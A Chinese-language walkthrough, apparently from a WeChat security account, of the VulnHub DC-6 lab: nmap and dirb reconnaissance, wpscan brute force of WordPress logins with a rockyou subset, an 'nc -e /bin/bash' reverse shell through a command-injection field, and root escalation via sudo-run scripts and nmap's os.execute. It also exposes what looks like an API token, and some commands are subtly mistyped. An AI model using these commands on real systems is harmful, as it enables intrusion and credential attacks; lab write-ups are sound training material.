靶场之路-VulnHub-DC-6
一、信息收集
1、扫描靶机ip
2、指纹扫描
这里扫的我有点懵,这里只有两个端口,感觉是要扫扫目录了
nmap -sS -sV 192.168.122.128
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
nmap -p- -sV -A 192.168.122.128
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
这个修复是因为靶场原因,需要在host文件下加入下面命令
nmap -p80 -sV -A 192.168.122.128
whatweb http://192.168.122.128
这里是需要修复一下的,在host文件下添加192.168.122.128 wordy
访问一下80端口,指纹一下
3、目录扫描
dirb http://192.168.122.128
dirsearch -u http://192.168.122.128/ -e * -i 200
这里没让我失望,80端口打不开不知道什么原因,看看扫出来的目录吧
4、寻找突破点
1、访问80端口
我只能访问几个目录,没什么头绪,但是在其中一个目录下找到了要用POST方法,这里因为有很多无法访问,被拒绝之类或找不到网页
这里有一些问答信息,感觉奇奇怪怪的
这里我们扫描了80端口网页使用的服务,一个WordPress5.1.1,应该是文字输入管理程序相关的,php、mysql、包括其他一些服务,不过这个WordPress感觉像突破口,还有Apache2.4.25。
2、爆破后台
这里两个思路,一个爆破WordPress后台,另一个找一起有无相关exp,我们还是要扫一下找找后台 我们尝试爆破该登录框
wpscan --url http://wordy -e u
爆破一下后台登陆
这里也是扫出来几个账户
我们尝试爆破,这里是下载靶机时作者提示使用kali自带的密码本即可,那我们尝试
gzip -d rockyou.txt.gz
首先解压这个密码本
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
从rockyou密码本中筛选密码存入passwords.txt中
wpscan --url http://wordy -U DC.txt -P passwords.txt --api-token PaWVhkqRqXsFOVwzzahi8Assl1uYaFSA1gqAnFsLgss
我们指定密码本、账户本和url就可以开始爆破了,这里的token自己去官网注册就行,每天使用25次
这里扫了快1个小时,一定要把所有字典都丢进一个路径里面。ok
3、寻找注入点
我们登录进去是一个邮箱系统,我们找到了一个命令执行的地方
这里能执行命令,没过滤,可以尝试反连shell
nc -e /bin/bash 192.168.122.128 6666
这里就是我们要注入的命令,提前在kali中开一个6666的监听
nc -nvlp 6666
这样就可以了
由于这里长度受到限制,我们进入f12改一下输入长度即可
4、shell反连、pty修复shell
这里反连shell成功后我们查看一下文件,但感觉这个shell是不完整的,可以尝试使用python的pty工具修复一下shell
修复之后我们进入home目录下有一个txt,一个新的账户。这个第一时间没联想到应该是ssh,尝试一下
5、找到突破口,反连一下登入jesn权限
这里有一个jens执行的文件,我们把提权语句丢到这个文件夹中
echo"/bin/bash" >>/home/jens/backups.sh
把这条命令丢进这个文件夹,这是一条提权命令,而这个文件是jens用户的文件,所以执行时反弹的shell也是jens的shell
sudo -u jens /home/jens/backups.sh
用jens,sudo命令来执行这个文件
然后我们就进入了jens中,我们查看有没有不需要sudo命令执行的文件夹
这里是有一个nmap文件,我们尝试使用这个文件夹来提权,nmap这个文件
6、nmap提权
1、这里似乎是两种方式提权,一种就是我们自己创建一个文件夹,然后写提权命令
touch root_shell.sh
创建一个sh文件
echo'os.execute("/bin/sh")'>root_shell.sh
把提权命令写入该文件
sudo nmap --script=root_shell.sh
--script=root_shell.sh 表示使用 root_shell.sh 这个脚本进行扫描。这个脚本可能是用户自定义的,也可能是用于尝试获取目标主机 root
2、第二种是用NSE脚本提权,我看到做题方法大致就是这两种,一个NSE另一个就是上面方法
cat os.execute("/bin/sh") > nse_root.nse
nmap --script=/path/to/nse_root.nse
❝
Nmap的NSE脚本提权 NSE(Nmap Scripting Engine)是Nmap的一个强大的功能,允许用户编写脚本来扩展Nmap的功能。如果Nmap以root权限运行,可以通过编写NSE脚本来执行提权操作。以下是一个简单的NSE脚本示例,该脚本尝试执行一个shell:
cat os.execute("/bin/sh") > nse_root.nse
然后,使用以下命令运行该NSE脚本:
nmap --script=/path/to/nse_root.nse
这将执行脚本中的命令,如果Nmap以root权限运行,那么就可以获取一个root shell。
总结:这个靶机并不算特别复杂,但是需要一些知识面,在打靶过程中也是越来越顺利了,接下来就要高强度打靶了,一天打两台或者更多吧,这是第七台靶机,打到10台左右就要独立尝试了,那是一个非常耗时的事情,希望多多尝试、多多坚持。而且这次靶机并没用到exp,而是其他一些知识,还是多练吧
2025.3.5 AM 9:53分
原文始发于微信公众号(泷羽Sec-朝阳):靶场之路-VulnHub-DC-6 nmap提权、kali爆破、shell反连
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论